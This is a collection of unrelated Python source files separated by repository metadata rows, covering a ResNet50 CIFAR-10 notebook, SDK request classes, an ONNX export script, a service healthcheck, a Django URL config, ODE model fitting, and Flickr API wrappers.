# %% [code] {"id":"E103YDdQ8NNq","execution":{"iopub.status.busy":"2021-08-02T17:31:58.167062Z","iopub.execute_input":"2021-08-02T17:31:58.167444Z","iopub.status.idle":"2021-08-02T17:32:18.257435Z","shell.execute_reply.started":"2021-08-02T17:31:58.167411Z","shell.execute_reply":"2021-08-02T17:32:18.254565Z"}}
def bad_res102(img,res):
sh=np.shape(img)
dwnsmp=cv2.resize(img,res, interpolation = cv2.INTER_CUBIC)
return dwnsmp
new_res = int(sys.argv[1]) if len(sys.argv) > 1 else 32
print('-----------setting resolution to {} ------'.format( new_res))
(training_images, training_labels), (test_images, test_labels) = tf.keras.datasets.cifar10.load_data()
training_images = np.array([bad_res102(xx,(new_res,new_res)) for xx in training_images])
validation_images = training_images[-5000:]
validation_labels = training_labels[-5000:]
training_images = training_images[:-5000]
training_labels = training_labels[:-5000]
# %% [markdown] {"id":"prd944ThNavt"}
# ### Visualize Dataset
#
# Use the `display_image` to view some of the images and their class labels.
# %% [code] {"id":"UiokWTuKo88c"}
# display_images(training_images, training_labels, training_labels, "Training Data" )
# %% [code] {"id":"-q35q41KNfxH"}
# display_images(validation_images, validation_labels, validation_labels, "Training Data" )
# %% [markdown] {"id":"ltKfwrCVNuIu"}
# ### Preprocess Dataset
# Here, we'll perform normalization on images in training and validation set.
# - We'll use the function [preprocess_input](https://github.com/keras-team/keras-applications/blob/master/keras_applications/resnet50.py) from the ResNet50 model in Keras.
# %% [code] {"id":"JIxdiJVKArC6"}
def preprocess_image_input(input_images):
input_images = input_images.astype('float32')
output_ims = tf.keras.applications.resnet50.preprocess_input(input_images)
return output_ims
# %% [code] {"id":"QOqjKzgAEU-Z"}
train_X = preprocess_image_input(training_images)
valid_X = preprocess_image_input(validation_images)
# %% [markdown] {"id":"2fooPL9Gkuox"}
# ## Define the Network
# We will be performing transfer learning on **ResNet50** available in Keras.
# - We'll load pre-trained **imagenet weights** to the model.
# - We'll choose to retain all layers of **ResNet50** along with the final classification layers.
# %% [code] {"id":"56y8UNFQIVwj"}
'''
Feature Extraction is performed by ResNet50 pretrained on imagenet weights.
Input size is 224 x 224.
'''
def feature_extractor(inputs):
feature_extractor = tf.keras.applications.resnet.ResNet50(input_shape=(224, 224, 3),
include_top=False,
weights='imagenet')(inputs)
return feature_extractor
'''
Defines final dense layers and subsequent softmax layer for classification.
'''
def classifier(inputs):
x = tf.keras.layers.GlobalAveragePooling2D()(inputs)
x = tf.keras.layers.Flatten()(x)
x = tf.keras.layers.Dense(1024, activation="relu")(x)
x = tf.keras.layers.Dense(512, activation="relu")(x)
x = tf.keras.layers.Dense(10, activation="softmax", name="classification")(x)
return x
'''
Since input image size is (32 x 32), first upsample the image by factor of (7x7) to transform it to (224 x 224)
Connect the feature extraction and "classifier" layers to build the model.
'''
def final_model(inputs):
resize = tf.keras.layers.UpSampling2D(size=(224//new_res, 224//new_res))(inputs)
resnet_feature_extractor = feature_extractor(resize)
classification_output = classifier(resnet_feature_extractor)
return classification_output
'''
Define the model and compile it.
Use Stochastic Gradient Descent as the optimizer.
Use Sparse Categorical CrossEntropy as the loss function.
'''
def define_compile_model():
inputs = tf.keras.layers.Input(shape=(new_res, new_res, 3))
classification_output = final_model(inputs)
model = tf.keras.Model(inputs=inputs, outputs=classification_output)
model.compile(optimizer='SGD',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
return model
model = define_compile_model()
model.summary()
# %% [markdown] {"id":"CuhDh8ao8VyB"}
# ## Train the model
# %% [code] {"id":"2K6RNDqtJ_xx"}
pdb.set_trace()
EPOCHS = 10
history = model.fit(train_X, training_labels, epochs=EPOCHS, validation_data=(valid_X, validation_labels),
batch_size=64, verbose=2)
# %% [markdown] {"id":"CYb5sAEmk4ut"}
# ## Evaluate the Model
#
# Calculate the loss and accuracy metrics using the model's `.evaluate` function.
# %% [code] {"id":"io7Fuu-w3PZi"}
loss, accuracy = model.evaluate(valid_X, validation_labels, batch_size=64)
# %% [markdown] {"id":"yml-phRfPeOj"}
# ### Plot Loss and Accuracy Curves
#
# Plot the loss (in blue) and validation loss (in green).
# %% [code] {"id":"b1ZMMJ6T921A"}
# plot_metrics("loss", "Loss")
# # %% [markdown] {"id":"QbnWIbeJJ_xx"}
# # Plot the training accuracy (blue) as well as the validation accuracy (green).
# # %% [code] {"id":"P0YpFs3J99eO"}
# plot_metrics("accuracy", "Accuracy")
# # %% [markdown] {"id":"9jFVovcUUVs1"}
# # ### Visualize predictions
# # We can take a look at the predictions on the validation set.
# # %% [code] {"id":"NIQAqkMV9adq"}
# probabilities = model.predict(valid_X, batch_size=64)
# probabilities = np.argmax(probabilities, axis = 1)
# display_images(validation_images, probabilities, validation_labels, "Bad predictions indicated in red.") | [
"sashkarivkind@gmail.com"
] | sashkarivkind@gmail.com |
a9844ec6bc76cbabb561aa8a324b90f85c935090 | f09dc121f213f2881df3572288b7ee5b39246d73 | /aliyun-python-sdk-hbr/aliyunsdkhbr/request/v20170908/DeleteSqlServerInstanceRequest.py | 8647a804d9271b31c253673d44db33fd213dcbae | [
"Apache-2.0"
] | permissive | hetw/aliyun-openapi-python-sdk | 2f31378ad6be0896fb8090423f607e9c7d3ae774 | 7443eacee9fbbaa93c7975c6dbec92d3c364c577 | refs/heads/master | 2023-01-19T22:42:36.214770 | 2020-12-04T10:55:14 | 2020-12-04T10:55:14 | 318,689,093 | 1 | 0 | NOASSERTION | 2020-12-05T03:03:03 | 2020-12-05T03:03:03 | null | UTF-8 | Python | false | false | 1,604 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkhbr.endpoint import endpoint_data
class DeleteSqlServerInstanceRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'hbr', '2017-09-08', 'DeleteSqlServerInstance','hbr')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_VaultId(self):
return self.get_query_params().get('VaultId')
def set_VaultId(self,VaultId):
self.add_query_param('VaultId',VaultId)
def get_ClusterId(self):
return self.get_query_params().get('ClusterId')
def set_ClusterId(self,ClusterId):
self.add_query_param('ClusterId',ClusterId) | [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
25c3b42a397977592ebd6616aeefe441954c721c | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/built-in/cv/classification/3D_ResNet_ID0421_for_PyTorch/pth2onnx.py | 344f0acb80d30eeb817bac80202a259a4e4fbed2 | [
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 2,739 | py | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pathlib import Path
import json
import random
import os
import numpy as np
import torch
from opts import parse_opts
from model import (generate_model, load_pretrained_model, make_data_parallel,
get_fine_tuning_parameters)
def json_serial(obj):
if isinstance(obj, Path):
return str(obj)
def get_opt():
opt = parse_opts()
if opt.root_path is not None:
opt.video_path = opt.root_path / opt.video_path
opt.annotation_path = opt.root_path / opt.annotation_path
opt.result_path = opt.root_path / opt.result_path
if opt.resume_path is not None:
opt.resume_path = opt.root_path / opt.resume_path
opt.arch = '{}-{}'.format(opt.model, opt.model_depth)
opt.begin_epoch = 1
opt.n_input_channels = 3
print(opt)
with (opt.result_path / 'opts.json').open('w') as opt_file:
json.dump(vars(opt), opt_file, default=json_serial)
return opt
def resume_model(resume_path, arch, model):
print('loading checkpoint {} model'.format(resume_path))
checkpoint = torch.load(resume_path, map_location='cpu')
assert arch == checkpoint['arch']
if hasattr(model, 'module'):
model.module.load_state_dict(checkpoint['state_dict'])
else:
model.load_state_dict(checkpoint['state_dict'])
return model
def main_worker(index, opt):
random.seed(opt.manual_seed)
np.random.seed(opt.manual_seed)
torch.manual_seed(opt.manual_seed)
model = generate_model(opt)
if opt.resume_path is not None:
model = resume_model(opt.resume_path, opt.arch, model)
model = make_data_parallel(model, opt.distributed, opt.device)
dummy_input = torch.ones(10, 3, 16, 112, 112)
torch.onnx.export(
model,
dummy_input,
'3D-ResNets.onnx',
input_names=['input'],
output_names=['output'],
export_params=True,
do_constant_folding=True,
verbose=True,
opset_version=11)
print('3D-ResNets.onnx export success')
if __name__ == '__main__':
opt = get_opt()
opt.device = torch.device('cpu')
main_worker(-1, opt) | [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
7459fac5b14862577f264dc372ac0888fef1bbd3 | bb397d825e5f8c8104426ec0ae7ecadcf1e1a408 | /files/nfs_install.py | 9b931bfbbda772e33bf381912be20aade123b261 | [] | no_license | AishwaryaBhargava/automation-of-different-technologies | ca29efe14e9c55ef2df0d1fa5e00a7e8f2cf67e3 | 30d288a60941ed7e5ec5529f822b4e85ad5146cc | refs/heads/master | 2020-05-27T23:40:43.547973 | 2019-05-27T14:09:00 | 2019-05-27T14:09:00 | 188,822,059 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 237 | py | #!/usr/bin/python2
import commands as sp
print("content-type:text/html")
cmd="sudo yum install nfs-utils -y"
output=sp.getstatusoutput(cmd)
if output[0]==0:
print("location:nfs.py")
print("")
else:
print("")
print("not installed")
| [
"noreply@github.com"
] | AishwaryaBhargava.noreply@github.com |
60b34903be6f840002151d09c5e58440231cbabf | 7cbc730e36312bfcbc850128aa362635709b21eb | /run.py | 83d38c2d880dc8d02a139b13235dd42e96f0663b | [] | no_license | rephus/healtcheck | 57a1f08d8b51c999bfe64da49a51bcf953eb032e | db9d4ad53d9cd882dcef4ea5f93db71567dbdcb3 | refs/heads/master | 2021-01-19T02:52:33.265742 | 2016-06-10T20:11:35 | 2016-06-10T20:11:35 | 60,874,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,707 | py | #!/usr/bin/python
import requests
import time
import sys
import ConfigParser
# Global variables
todayDate=time.strftime("%Y/%m/%d")
todayHour=time.strftime("%H:%M:%S")
# Check status
def check (service, url,content):
start = time.time()
print "Checking "+service
valid = contains(url,content)
print "* Request took {} seconds ".format(int(time.time() - start))
if not valid:
error = "'"+url+"' doesn't contain '"+content+"'"
print "* Service "+service+" check FAILED at "+todayDate+" "+todayHour +": " +error
subject="Service "+service+" DOWN"
message="Service "+service+" failed at "+todayDate+" "+todayHour +":\n\n"+error
sys.exit(1)
else:
print "* OK"
def contains (url, content):
for r in range(retry) :
try:
text = requests.get(url, timeout = timeout).text
exist = text.find(content) != -1
if not exist:
if debug: print """* URL '{}':
** expected '{}'
** got '{}'""".format(url,content,text.encode('utf8'))
return exist
except Exception as error:
print "* ({}) Error in '{}': {}".format(r,url,error)
return False
# Main
print "Running checkHealth script at "+todayDate+" "+todayHour+"\n"
# Load config
config = ConfigParser.ConfigParser()
config.read("config.cfg")
timeout = int (config.get('config', 'timeout') )
debug = config.get('config', 'debug') == 'true'
retry = int (config.get('config', 'retry'))
servers = config.items("servers")
for server in servers:
service = server[0]
values = server[1].split(",")
endpoint = values[0]
content = values[1]
check(service,endpoint,content)
print "\nCheckHealth script ended without errors \n"
sys.exit(0)
| [
"rephus@gmail.com"
] | rephus@gmail.com |
aae7dd2cfaf3a8d5e1004d485b4fefda31a6a855 | 3e432355cb71671e899c15a6ca973012f7a07be0 | /django1/urls.py | 658071eccfea6dfd537695a7d7f13e54156e3db9 | [] | no_license | rajeshpandey2053/Django-assignment-1- | b101250ec6da656e0400f84a8e85261259ce00c2 | 6c42fcb5012bb50b557cec029737661d05437130 | refs/heads/master | 2022-11-18T21:15:28.395827 | 2020-07-19T14:47:50 | 2020-07-19T14:47:50 | 280,885,882 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 804 | py | """django1 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('blogapp/', include("blogapp.urls"))
]
| [
"rajeshpandey2053@gmail.com"
] | rajeshpandey2053@gmail.com |
9199606a60e49fbfbf6d066642c2d3562eba52c2 | 8553312aad8af2a7371c2e5884561d3dcd00dda7 | /Model Fitting/Kfold/3 state 3 hill/fold 3/3state3.py | 63b65a59d787b1c774e541bdbedfa9b9b9753134 | [
"MIT"
] | permissive | keung-lab/Dynamic-Transfer-Functions | aa76125b228092d4af93172c9f051c6593b1f4e2 | 68c17a3ccfedab6625cc4d0c2e1c7983d7b46153 | refs/heads/main | 2023-04-09T15:03:48.667157 | 2021-07-20T16:50:33 | 2021-07-20T16:50:33 | 322,337,993 | 1 | 0 | null | 2021-07-20T16:50:34 | 2020-12-17T15:37:06 | MATLAB | UTF-8 | Python | false | false | 5,070 | py | import numpy as np
import pandas as pd
import matplotlib
import jupyter
import scipy
from scipy.integrate import odeint
#%matplotlib inline
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
import sklearn
from sklearn.model_selection import StratifiedKFold
from mpi4py import MPI
import sys
from datetime import datetime
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
## Stratified Kfold Validation Setup
rn = pd.read_csv('Outputclass.csv')
skf = StratifiedKFold(n_splits=4, shuffle=True, random_state=100)
target = rn.loc[:,'class']
trainendpts = []
testendpts = []
fold_no = 1
for train_index, test_index in skf.split(rn, target):
train = rn.loc[train_index,:]
traincols = (np.take(rn['output'],train_index))
trendpts = np.asarray(traincols)
trainendpts.append(trendpts)
fold_no += 1
##
comm = MPI.COMM_WORLD
size = comm.Get_size()
rank = comm.Get_rank()
name = MPI.Get_processor_name()
runtime = datetime.now().time()
arr_size = 0
if rank == 0:
#rawdata = np.transpose(np.delete(np.genfromtxt('SizeCorrectedAllOut.csv',delimiter=','),0,0))
rawdata = trainendpts[2]
newdata = list(rawdata.flatten())
all_parameters = (np.delete(np.genfromtxt('params33.csv', delimiter=','),0,0))
arr_sizes = [(int)(len(all_parameters)/size)]*size
parameters = []
ind = 0
for i in range(size):
arr_sizes[i] += i<(len(all_parameters)%size)
parameters.append(all_parameters[ind:ind+arr_sizes[i]])
ind += arr_sizes[i]
#print(parameters)
else:
parameters = None
parameters = comm.scatter(parameters, root=0)
comm.Barrier()
t = np.linspace(0,50395, num=10080)
def func(t):
z0 = [1,0,0,0,0,0]
trainlight = []
fold_no = 1
for train_index, test_index in skf.split(rn, target):
train = rn.loc[train_index,:]
traincols = (np.take(rn['cond'],train_index))
lightdata = np.transpose(np.delete(np.genfromtxt('AllLightnosmooth.csv', delimiter=','),0,0))
trlight = np.array(lightdata[[traincols]])
trainlight.append(trlight)
fold_no += 1
lightdata = trainlight[2]
arrayvalues = np.asarray([])
end = np.zeros((len(parameters[:,0]),len(lightdata[:,0])))
for i in range(len(lightdata[:,0])):
def I(t):
tindex = t/5
if tindex > 10079:
tindex = 10079
return lightdata[i][int(tindex)]
for j in range(len(parameters[:,0])):
# sys.stdout.write("I am process %d of %d at %s.\n on %s.\n " % (rank, size,runtime, name))
if rank == 0:
print(str(j) + '/' + str(len(parameters[:,0])) + ' on ' + str(i) + '/' + str(len(lightdata[:,0])))
def model(z,t):
p1 = parameters[:,0]
p2 = parameters[:,1]
p3 = parameters[:,2]
p4 = parameters[:,3]
p5 = parameters[:,4]
p6 = parameters[:,5]
p7 = parameters[:,6]
#p8 = parameters[:,7]
#d3 = p1[j]
#d4 = p2[j]
d1 = p1[j]
k1 = p2[j]
d2 = p3[j]
k2 = p4[j]
Kd = p5[j]
n = p6[j]
k3 = p7[j]
#d3 = p8[j]
#d1 = 0.017281
#k1 = 0.4241
#d2 = 1.7709
#k2 = 0.021968
#Kd = 2143.243
#n = 0.815678
#k3 = 0.000287
d3 = 0.000544
k4 = 1.25
d4 = 0.0000924
k5 = 0.00144
Pu = z[0]
Pb = z[1]
Pa = z[2]
mRNA = z[3]
mCherry1 = z[4]
mCherry2 = z[5]
dPudt = d1*Pb - k1*I(t)**n/(Kd**n+I(t)**n)*Pu
dPbdt = k1*I(t)**n/(Kd**n+I(t)**n)*Pu + d2*Pa - d1*Pb - k2*I(t)**n/(Kd**n+I(t)**n)*Pb
dPadt = k2*I(t)**n/(Kd**n+I(t)**n)*Pb - d2*Pa
dmRNAdt = k3*I(t)**n/(Kd**n+I(t)**n)*Pa - d3*mRNA
dmCherry1dt = k4*mRNA-(d4 + k5)*mCherry1
dmCherry2dt = k5*mCherry1-d4*mCherry2
return [dPudt,dPbdt,dPadt,dmRNAdt,dmCherry1dt,dmCherry2dt]
z = odeint(model,z0,t, hmax=1)
mCherry2 = z[:,5]
end[j,i] = mCherry2[-1]
return end
model1 = np.asarray(func(t))
#gather here
model1 = comm.gather(model1,root=0)
if rank == 0:
model1 = np.concatenate(model1)
ydata = np.asarray(newdata)
np.savetxt('3model_out_fold3.csv',model1,delimiter=',')
# print('end = ', model1)
# print(ydata)
with open('3model_R2_fold3.csv','w') as f:
for j in range(len(all_parameters[:,0])):
ssr = np.sum((ydata - model1[j])**2)
sst = np.sum((ydata - np.mean(ydata))**2)
R2 = 1 - ssr/sst
f.write(str(j+1) + ',' + str(R2) + '\n')
| [
"noreply@github.com"
] | keung-lab.noreply@github.com |
73c2c8db45940756b9d7256370367dd3f7dde382 | 6d906ae790de5494692bf6a12668d60418b1da72 | /govauction_load/load_test_file.py | c8ad61090d505bce78eaa9399afb8b0ddc07849e | [
"Apache-2.0"
] | permissive | lesiavl/selenium_perfomance_tests | 6c5407172bdf05a08b669b6f80bc287e94e34ef9 | 83cb1d734d6723cc5b6d6a8aa37b6598f06cbcfe | refs/heads/master | 2021-01-22T10:56:02.462717 | 2017-06-01T10:39:24 | 2017-06-01T10:39:24 | 82,050,059 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,288 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from page_objects import *
from selenium import webdriver
import datetime
import time
import Queue
import threading
import traceback
tenders = Queue.Queue()
tenders_ids = []
tenders_threads = 1
bids = Queue.Queue()
bids_failed = {}
runs = Queue.Queue()
class CreateTenders(threading.Thread):
exited = False
def __init__(self, queue, driver):
threading.Thread.__init__(self)
self.queue = queue
self.driver = driver
self.login_page_owner = LoginPage(
owner_users['email'], owner_users['password'], self.driver
)
self.create_tender_page = CreateTenderPage(self.driver)
self.find_tender = FindTenderPage(self.driver)
def run(self):
while True:
# Wait for start
self.queue.get()
# Process business logic
self.driver.get(broker['url'])
try:
self.login_page_owner.login_as_owner()
self.driver.get(create_tender_url)
self.create_tender_page.create_tender()
tenders_ids.append(self.find_tender.get_tender_id())
except Exception as error:
# self.driver.close()
self.exited = True
print (error)
traceback.print_exc()
raise error
finally:
self.queue.task_done()
class MakeTendersBids(threading.Thread):
exited = False
def __init__(self, queue, user, password, tender_id, driver):
threading.Thread.__init__(self)
self.queue = queue
self.driver = driver
self.tender_id = tender_id
self.login_page_provider = LoginPage(user, password, self.driver)
self.find_tender = FindTenderPage(self.driver)
self.make_bid_page = MakeBidPage(self.driver)
def run(self):
while True:
# Wait for start
self.queue.get()
self.driver.get(broker['url'])
# Process business logic
try:
self.login_page_provider.login_as_provider()
self.driver.get(tenders_list)
self.find_tender.find_tender(self.tender_id)
if not self.make_bid_page.make_bid():
bids_failed[self.tender_id] = 'failed'
print('Bid failed for tender: {}'.format(self.tender_id))
return
bids_failed[self.tender_id] = 'passed'
print('Bid success for tender {}'.format(self.tender_id))
except Exception as error:
# self.driver.close()
self.exited = False
print(error)
traceback.print_exc()
raise error
finally:
self.queue.task_done()
class RunTenderBids(threading.Thread):
def __init__(self, queue, driver, providerAndTender):
threading.Thread.__init__(self)
self.queue = queue
self.driver = driver
self.make_bid_page = MakeBidPage(self.driver)
self.providerAndTender = providerAndTender
def run(self):
while True:
# Wait for start
self.queue.get()
# Process business logic
try:
with open('load_results.txt', 'a') as fl:
fl.write('{} started bid for {} —---------------- STARTED\n'.format(self.providerAndTender, datetime.datetime.now()))
self.make_bid_page.run_bid()
fl.write('{} made bid for {} —---------------- FINISHED\n'.format(self.providerAndTender, datetime.datetime.now()))
fl.close()
finally:
self.queue.task_done()
start = time.time()
# Start creating tenders
print('Start creating tenders...')
for i in range(tenders_threads):
driver = webdriver.Chrome()
driver.set_window_size(1200, 1000)
t = CreateTenders(tenders, driver)
t.setDaemon(True)
t.start()
for i in range(tenders_threads):
tenders.put(True)
# Wait for all to complete
tenders.join()
print('Tenders created - ' + ', '.join(tenders_ids))
# Start making tenders bids
print('Start making bids...')
drivers = {}
for tid in tenders_ids:
for provider in provider_users.items():
driver = webdriver.Chrome()
driver.set_window_size(1200, 1000)
drivers['{} {}'.format(provider[0], tid)] = driver
b = MakeTendersBids(bids, provider[0], provider[1], tid, driver)
b.setDaemon(True)
print(provider[0], tid)
b.start()
for tid in tenders_ids:
for provider in provider_users.items():
bids.put(True)
bids.join()
print('Bids made')
print(bids_failed)
with open('load_results.txt', 'a') as f:
f.write('{} failed \n'.format(bids_failed))
f.close()
# Start making by clicking simultaneously
print('Start running bids...')
for driver in drivers.keys():
c = RunTenderBids(runs, drivers[driver], driver)
c.setDaemon(True)
c.start()
for driver in drivers:
runs.put(True)
runs.join()
print('Runs performed')
print("Elapsed Time: %s" % (time.time() - start))
for driver in drivers:
drivers[driver].close()
| [
"lesia.velychko@gmail.com"
] | lesia.velychko@gmail.com |
5ec315cf056563ef4196d389d7e6b49012941112 | 9ee1e6efea3899edef676a13b3a5d5c38a5f9ce1 | /Task_Module01/ceknum.py | 7b21e220931176559fcd5418c4aa7774731c168a | [] | no_license | ksmrdn/Module01_Python | 8f455fb36b097edf6a40e53b1162ef4355668ab9 | dbde29247e8978876f6e1c71397297cfda016a3a | refs/heads/master | 2020-09-07T22:39:40.716886 | 2019-11-11T08:25:18 | 2019-11-11T08:25:18 | 220,932,447 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | num0 = 12
golongan = []
def prima(x):
if x > 1:
if x == 2:
a = True
else:
for i in range(2,x):
if x % i == 0:
a = False
break
else:
a = True
else:
a = False
return a
print(prima(num0))
if type(num0) == int:
golongan.append('Bulat')
if num0 >= 0:
golongan.append('Cacah')
if num0 > 0:
golongan.append('Asli')
if num0 % 2 == 0:
golongan.append('Genap')
elif num0 % 2 != 0:
golongan.append('Ganjil')
if prima(num0) == True:
golongan.append('Prima')
else:
golongan.append('Komposit')
if num0 < 0:
golongan.append('Negatif')
elif num0 == 0:
golongan.append('Nol')
print(golongan)
| [
"kusumardanar@gmail.com"
] | kusumardanar@gmail.com |
fe0b784d9423f6752a2e04ea2db13d45f4526bf0 | 7249edf3365731c92a9c9c05db3186894306cc17 | /python/src/vmaf/svmutil.py | ca49e991943642c3fce7b7aca7f07566c7af3622 | [
"LGPL-3.0-or-later",
"Apache-2.0"
] | permissive | sunery/vmaf | 22e2f782549e1c71aa6f5160f26350e0aca06189 | 03eb8a4980b1bf2b3edd66767e67927109dbd9de | refs/heads/master | 2020-04-01T15:12:57.469291 | 2018-10-15T00:31:21 | 2018-10-15T00:31:21 | 153,327,009 | 1 | 0 | Apache-2.0 | 2018-10-16T17:32:53 | 2018-10-16T17:32:53 | null | UTF-8 | Python | false | false | 735 | py | # TODO: dependency on libsvm/svmutil needs to be properly done, this is a temporary workaround wrapper
from __future__ import absolute_import
import sys
from vmaf.config import VmafConfig
# This will work only when running with a checked out vmaf source, but not via pip install
libsvm_path = VmafConfig.root_path('libsvm', 'python')
if libsvm_path not in sys.path:
# Inject {project}/libsvm/python to PYTHONPATH dynamically
sys.path.append(libsvm_path)
try:
# This import will work only if above injection was meaningful (ie: user has the files in the right place)
from svmutil import * # noqa
except ImportError as e:
print "Can't import svmutil from %s: %s" % (libsvm_path, e)
sys.exit(1)
| [
"zli@netflix.com"
] | zli@netflix.com |
a85f58e88b5664a708051c99c0c4ada535118d4e | 70121257e52e0fd2f0895414fcee3c991737443a | /python_recipes/danfo_csv.py | 96c22906850257b9b40aa400587b7180e3fa23bd | [] | no_license | OlgaBelitskaya/cookbooks | 2e54208bb5e5157814deea6ff71cd7ce5b1e4972 | 216dde3e5617203371ed4c4bb7d9e8391640c588 | refs/heads/master | 2021-07-11T15:56:44.923442 | 2021-03-25T08:38:46 | 2021-03-25T08:38:46 | 99,447,645 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,696 | py | from IPython.core.display import display,HTML
def danfo_table_csv(url,columns,header_font_size):
html_str="""<html><head><meta charset='UTF-8'>"""+\
"""<meta name='viewport' """+\
"""content='width=device-width,initial-scale=1.0'>"""+\
"""<script src='https://cdn.jsdelivr.net/npm/"""+\
"""danfojs@0.1.1/dist/index.min.js'></script></head>"""+\
"""<div><p> CSV =>>> Danfo DataFrames</p>"""+\
"""<div id='div015_1'></div><script>"""+\
"""var url='"""+url+"""'; """+\
"""dfd.read_csv(url)"""+\
""" .then(df=>{df.loc({columns:"""+str(columns)+\
"""}).plot('div015_1').table({header_style:"""+\
"""{font:{size:"""+str(header_font_size)+"""}}})})"""+\
""" .catch(err=>{console.log(err);})"""+\
"""</script></div></html>"""
display(HTML(html_str))
def danfo_chart_csv(url,columns,line_width,title):
html_str="""<html><head><meta charset='UTF-8'>"""+\
"""<meta name='viewport' """+\
"""content='width=device-width,initial-scale=1.0'>"""+\
"""<script src='https://cdn.jsdelivr.net/npm/"""+\
"""danfojs@0.1.1/dist/index.min.js'> </script></head>"""+\
"""<body><p> CSV =>>> Danfo DataFrames</p>"""+\
"""<div id='div015_2'></div><script>"""+\
"""var url='"""+url+"""'; """+\
"""dfd.read_csv(url).then(df=>{var layout={"""+\
""" title:'"""+title+\
"""',xaxis:{title:'columns'},"""+\
""" yaxis:{title:'value'}}; """+\
""" df.plot('div015_2').line({"""+\
"""line:{width:"""+str(line_width)+"""},"""+\
"""columns:"""+str(columns)+""",layout:layout})})"""+\
""" .catch(err=>{console.log(err);})"""+\
"""</script></body></html>"""
display(HTML(html_str)) | [
"safuolga@gmail.com"
] | safuolga@gmail.com |
55dbe8317f1c57f0eda91ec6f4ea5d6a3355faf5 | 44064ed79f173ddca96174913910c1610992b7cb | /Second_Processing_app/temboo/Library/Flickr/Places/FindByKeyword.py | c0620abf4ec0d8e85c197a86e1e3a6d28555d771 | [] | no_license | dattasaurabh82/Final_thesis | 440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5 | 8edaea62f5987db026adfffb6b52b59b119f6375 | refs/heads/master | 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,859 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# FindByKeyword
# Returns a list of place IDs for a query string.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class FindByKeyword(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the FindByKeyword Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
Choreography.__init__(self, temboo_session, '/Library/Flickr/Places/FindByKeyword')
def new_input_set(self):
return FindByKeywordInputSet()
def _make_result_set(self, result, path):
return FindByKeywordResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return FindByKeywordChoreographyExecution(session, exec_id, path)
class FindByKeywordInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the FindByKeyword
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((required, string) The API Key provided by Flickr (AKA the OAuth Consumer Key).)
"""
InputSet._set_input(self, 'APIKey', value)
def set_Query(self, value):
"""
Set the value of the Query input for this Choreo. ((required, string) The query string to use for place ID lookups.)
"""
InputSet._set_input(self, 'Query', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are: xml and json. Defaults to json.)
"""
InputSet._set_input(self, 'ResponseFormat', value)
